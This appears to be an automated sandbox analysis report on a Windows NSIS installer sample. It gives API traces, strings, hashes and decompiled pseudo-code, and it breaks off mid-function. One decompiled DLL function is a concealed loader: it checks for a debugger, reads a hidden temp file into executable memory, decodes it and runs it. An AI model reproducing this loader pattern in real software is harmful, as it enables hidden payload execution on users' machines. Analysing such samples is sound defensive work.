0x004034fa
0x004034fc
0x00403500
0x00403500
0x004034fc
0x00403505
0x0040350a
0x0040350d
0x0040350f
0x0040350f
0x00403517
0x00403517
0x0040334b
0x00403352
0x00403352
0x004032d7
0x00403322
0x00403322
0x0040332e
0x00000000
0x0040332e
0x004032e0
0x004032ed
0x004032e4
0x004032ea
0x00000000
0x00000000
0x004032ec
0x004032ec
0x004032ec
0x004032f1
0x004032f3
0x004032f8
0x0040335e
0x00403366
0x0040336c
0x0040337b
0x0040337d
0x00403386
0x00403391
0x0040339b
0x004033a3
0x00000000
0x00000000
0x004033cf
0x00000000
0x00000000
0x004033e5
0x004033ee
0x004033fa
0x0040340a
0x004033fc
0x00403402
0x00403402
0x00403415
0x0040341f
0x0040342a
0x00403431
0x00403437
0x0040343e
0x00403445
0x00403448
0x0040344e
0x0040344e
0x00403445
0x00403450
0x00403450
0x00403456
0x0040345a
0x00000000
0x00403465
0x004032fa
0x004032fd
0x00403308
0x00000000
0x00000000
0x00403310
0x0040331b
0x00403320
0x00000000
0x00403320
0x00000000
0x00403299
0x00000000
0x00000000
0x00000000
0x0040324d
0x0040324d
0x0040324d
0x0040324e
0x0040324e
0x00000000
0x0040324d
0x00000000
0x004032b1
0x004031d8
0x004031e4
0x004031f0
0x00000000
0x00000000
0x00000000

APIs

#17.COMCTL32 ref: 00403180
OleInitialize.OLE32(00000000), ref: 00403187
SHGetFileInfoA.SHELL32(00429860,00000000,?,00000160,00000000), ref: 004031A3

Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,arability Setup,NSIS Error), ref: 004059E8

GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,arability Setup,NSIS Error), ref: 004031C3
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031D8
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031E4

Part of subcall function 00403132: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153

DeleteFileA.KERNELBASE("C:\Users\user\Desktop\eQLPRPErea.exe" ), ref: 004031FC
GetCommandLineA.KERNEL32 ref: 00403202
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00403211
CharNextA.USER32(00000000,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000020), ref: 0040323C
OleUninitialize.OLE32(00000000,00000000,00000020), ref: 00403337
ExitProcess.KERNEL32 ref: 00403352
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000,00000000,00000000,00000020), ref: 0040335E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000,00000000,00000000,00000020), ref: 00403366
lstrcatA.KERNEL32(00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403386
lstrcatA.KERNEL32(00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403391
DeleteFileA.KERNEL32(00428C61,00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 0040339B
GetModuleFileNameA.KERNEL32(00429460,00000400), ref: 004033B5
lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033C7
CopyFileA.KERNEL32 ref: 004033DD
lstrcatA.KERNEL32(00428C60,00409218,00429460,00428C61,00000000), ref: 00403415
lstrcatA.KERNEL32(00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040341F
lstrcatA.KERNEL32(00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040342A
lstrcatA.KERNEL32(00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403431
CloseHandle.KERNEL32(00000000,00428C60,C:\Users\user\AppData\Local\Temp\,00428C60,00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403448
GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034B8
ExitWindowsEx.USER32(00000002,00000000), ref: 004034F4
ExitProcess.KERNEL32 ref: 00403517

Strings

Error launching installer, xrefs: 004032F3
~nsu.tmp\, xrefs: 00403358
/D=, xrefs: 00403292
OpenProcessToken, xrefs: 0040347C
Au_.exe, xrefs: 0040338B, 00403450
NCRC, xrefs: 0040327C
\Temp, xrefs: 004031DE
LookupPrivilegeValueA, xrefs: 00403487
_?=, xrefs: 00403424
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403176
ADVAPI32.dll, xrefs: 00403477, 00403481, 0040348C, 00403499
SeShutdownPrivilege, xrefs: 004034CA
", xrefs: 0040325E
_?=, xrefs: 004032E4
C:\Users\user\AppData\Local\Temp\, xrefs: 004031B8, 004031BD, 004031D7, 004031E3, 0040335D, 00403365, 0040337B, 0040343C
C:\Users\user\AppData\Local\Temp, xrefs: 004032BB, 0040330B, 004033F3, 004033FC
NSIS Error, xrefs: 004031A9
arability Setup, xrefs: 004031AE
AdjustTokenPrivileges, xrefs: 00403494
C:\Users\user\AppData\Local\Temp, xrefs: 00403316
"C:\Users\user\Desktop\eQLPRPErea.exe" , xrefs: 004031F6, 004031FB, 00403209, 004032DA

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\eQLPRPErea.exe" $ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$arability Setup$~nsu.tmp\
API String ID: 3079827372-14758484
Opcode ID: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
Instruction ID: b2928dc65eb712516e19e911de1db687ceab521ce29b32085d2a85fb78ed52a1
Opcode Fuzzy Hash: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
Instruction Fuzzy Hash: 1791E370A48750BAD7216F619C0AB2B3E9CEF4570AF54097FF441B61D3CBBC99018A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040531D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040531D(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055C8(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059DB(0x42b8a8, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E0040552F(_t74);
					} else {
						lstrcatA(0x42b8a8, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x42b8a8,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E00405513( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059DB(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D7E(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x42f4a8 =  *0x42f4a8 + 1;
									} else {
										E00404D7E(0xfffffff1, _t74);
										E00405723(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E0040531D(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CB0(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054E8(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7E(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D7E(0xfffffff1, _t74);
							return E00405723(_t74, 0);
						}
						L30:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405328
0x0040532c
0x00405335
0x00405338
0x0040533b
0x00405343
0x00405345
0x00405346
0x00000000
0x00405346
0x00405355
0x00405355
0x00405358
0x0040535b
0x0040536f
0x00405376
0x0040537b
0x0040537d
0x0040538d
0x0040537f
0x00405385
0x00405385
0x00405398
0x004053ad
0x004053af
0x004053b5
0x004053b8
0x004053bb
0x0040547d
0x0040547d
0x00405481
0x00405483
0x00405483
0x00405483
0x00405483
0x00000000
0x00000000
0x00000000
0x00000000
0x004053c1
0x004053c1
0x004053ca
0x004053d0
0x004053d5
0x004053d8
0x004053da
0x004053de
0x004053e0
0x004053e0
0x004053de
0x004053e3
0x004053e6
0x004053f9
0x004053fb
0x00405400
0x00405406
0x00405408
0x00405423
0x0040542a
0x00405430
0x00405432
0x00405457
0x00405434
0x00405434
0x00405438
0x0040544c
0x0040543a
0x0040543d
0x00405445
0x00405445
0x00405438
0x0040540a
0x00405410
0x00405412
0x00405418
0x00405418
0x00405412
0x00000000
0x00405408
0x004053e8
0x004053eb
0x004053ed
0x00000000
0x00000000
0x004053ef
0x004053f1
0x00000000
0x00000000
0x004053f3
0x004053f7
0x00000000
0x00000000
0x00000000
0x0040545c
0x00405466
0x0040546c
0x0040546c
0x00405477
0x00000000
0x0040535d
0x0040535d
0x0040535f
0x00405487
0x0040548a
0x0040548d
0x004054e5
0x004054e5
0x004054e5
0x0040548f
0x00405492
0x0040549d
0x004054a2
0x004054a4
0x00000000
0x00000000
0x004054a7
0x004054b2
0x004054b9
0x004054bf
0x004054c1
0x00000000
0x004054dd
0x004054c3
0x004054c7
0x00000000
0x00000000
0x004054cc
0x00000000
0x004054d3
0x00405494
0x00405494
0x00000000
0x00405494
0x00405365
0x00405369
0x00000000
0x00000000
0x00000000
0x00405369

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 0040533B
lstrcatA.KERNEL32(0042B8A8,\*.*,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00405385
lstrcatA.KERNEL32(?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00405398
lstrlenA.KERNEL32(?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 0040539E
FindFirstFileA.KERNEL32(0042B8A8,?,?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 004053AF
FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 00405466
FindClose.KERNEL32(?), ref: 00405477

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405351
\*.*, xrefs: 0040537F
"C:\Users\user\Desktop\eQLPRPErea.exe" , xrefs: 00405327

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\eQLPRPErea.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1086794088
Opcode ID: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
Instruction ID: 3fe59752bbf574e46fae068060fc046f50c982b120df211f1784a4fc8f97d981
Opcode Fuzzy Hash: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
Instruction Fuzzy Hash: E651CE30404A54BACB216B618C85BFF3B78DF42755F14817BF941B61D2C77C4982DE6A

Uniqueness

Uniqueness Score: -1.00%

Function 6FC61000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E6FC61000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t21;
				void* _t32;
				long _t35;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\qmnajxcs95hz");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t32 = _t16;
					if(_t32 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t32, 0);
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t35, 0x3000, 0x40); // executed
					 *0x6fc63000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t32, _t16, _t35,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x6fc63000(); // executed
						goto L11;
					}
					do {
						asm("rol cl, 0x2");
						asm("rol cl, 0x3");
						asm("ror cl, 1");
						 *( *0x6fc63000 + _t21) =  !(_t21 - ( !( *( *0x6fc63000 + _t21)) ^ _t21) + 0x0000007b - _t21 ^ 0x00000079);
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					goto L10;
				}
				return _t12;
			}

0x6fc61009
0x6fc61018
0x6fc6101a
0x6fc6101a
0x6fc6102c
0x6fc61034
0x6fc61047
0x6fc61066
0x6fc6106c
0x6fc61071
0x6fc610f4
0x00000000
0x6fc610f4
0x6fc6107b
0x6fc61081
0x6fc61086
0x6fc610f3
0x00000000
0x6fc610f3
0x6fc61092
0x6fc61098
0x6fc6109f
0x00000000
0x00000000
0x6fc610aa
0x6fc610b2
0x00000000
0x00000000
0x6fc610b5
0x6fc610ba
0x6fc610ec
0x6fc610ec
0x00000000
0x6fc610f2
0x6fc610c0
0x6fc610d4
0x6fc610dc
0x6fc610e1
0x6fc610e3
0x6fc610e6
0x6fc610e7
0x00000000
0x6fc610c0
0x6fc610f8

APIs

IsDebuggerPresent.KERNEL32 ref: 6FC61010
DebugBreak.KERNEL32 ref: 6FC6101A
GetTempPathW.KERNEL32(00000103,?), ref: 6FC6102C
lstrcatW.KERNEL32(?,\qmnajxcs95hz), ref: 6FC61047
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FC61066
GetFileSize.KERNEL32(00000000,00000000), ref: 6FC6107B
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6FC61092
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6FC610AA

Strings

\qmnajxcs95hz, xrefs: 6FC6103B

Memory Dump Source

Source File: 00000001.00000002.704535848.000000006FC61000.00000020.00020000.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000001.00000002.704530208.000000006FC60000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.704540437.000000006FC62000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.704544378.000000006FC64000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
String ID: \qmnajxcs95hz
API String ID: 4020703165-538203009
Opcode ID: 2a54504572c2ad2bb1db916384511798ae6a4fe685d3659c72ba21b85052c2c4
Instruction ID: ad265f3bd57031a82d4ac1adb049676293b9f84476a4143b9944d35de928c3f4
Opcode Fuzzy Hash: 2a54504572c2ad2bb1db916384511798ae6a4fe685d3659c72ba21b85052c2c4
Instruction Fuzzy Hash: 0E21F43460D612AFEF209B66CCAEBEA7B7CEB06B61F104151EB14E61C1EB746109C761

Uniqueness

Uniqueness Score: -1.00%

Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x42f4d0 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D7E(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x430000, 0x40b040, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}

0x00401fdc
0x00401fe4
0x00401fe7
0x00401ff3
0x00402093
0x00000000
0x00401ff9
0x00402001
0x0040200b
0x0040200e
0x0040201d
0x0040201e
0x00402024
0x00402028
0x0040208f
0x00402095
0x00402095
0x00000000
0x00000000
0x00000000
0x00402010
0x00402011
0x00402017
0x0040201b
0x0040202a
0x00402034
0x00402038
0x0040207c
0x0040203a
0x0040203d
0x00402040
0x00402070
0x00402042
0x00402045
0x0040204e
0x00402050
0x00402050
0x0040204e
0x00402040
0x00402084
0x00402087
0x00402087
0x00000000
0x00000000
0x00000000
0x0040201b
0x0040200e
0x0040209b
0x00402932
0x0040293e

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011

Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,73BCEA30), ref: 00404DDA
Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A

LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
SetErrorMode.KERNEL32 ref: 0040209B

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 1609199483-0
Opcode ID: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
Instruction ID: c5381c54e09c994885a3158ba55f540892437f2dc07422c62f15d33d11318b3a
Opcode Fuzzy Hash: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
Instruction Fuzzy Hash: 69210B31D04321EBCB216FA59E4CA5E7670AF54315B20023BF712B22E1D7BC4982DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB0(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x42c8f0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x42c8f0;
			}

0x00405cbe
0x00405cca
0x00405cd2
0x00405cd4
0x00405cd9
0x00000000
0x00405ce6
0x00405cdc
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\eQLPRPErea.exe" ), ref: 00405CBE
FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
FindClose.KERNELBASE(00000000), ref: 00405CDC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2885216544-3081826266
Opcode ID: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
Instruction ID: 4661ff598cab52d61aefab85f16d743ffe836d29aedf95ad22b7aca8ae85483a
Opcode Fuzzy Hash: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
Instruction Fuzzy Hash: 27E0CD32B087605BD20017B46D88D0B365CEBD5721F104133F600F62D0C6B55C014BF9

Uniqueness

Uniqueness Score: -1.00%

Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				char _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				long _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				long _t78;
				void* _t79;
				intOrPtr _t89;
				void* _t91;
				long _t92;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				long _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\jones\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x42f420, "C:\\Users\\jones\\Desktop", 0x400);
				_t91 = E004056AC(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040552F(_t100);
				_t56 = GetFileSize(_t91, 0);
				 *0x428c58 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					if( *0x42f42c == 0) {
						goto L33;
					}
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E0040311B( *0x42f42c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff); // executed
						_t62 = E00402EBD(); // executed
						if(_t62 == _v28) {
							 *0x42f428 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
							}
							 *0x42f4c0 =  *_t102 & 0x00000018;
							 *0x42f430 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x42f434 =  *0x42f434 + 1;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
							} while (_t93 != 0);
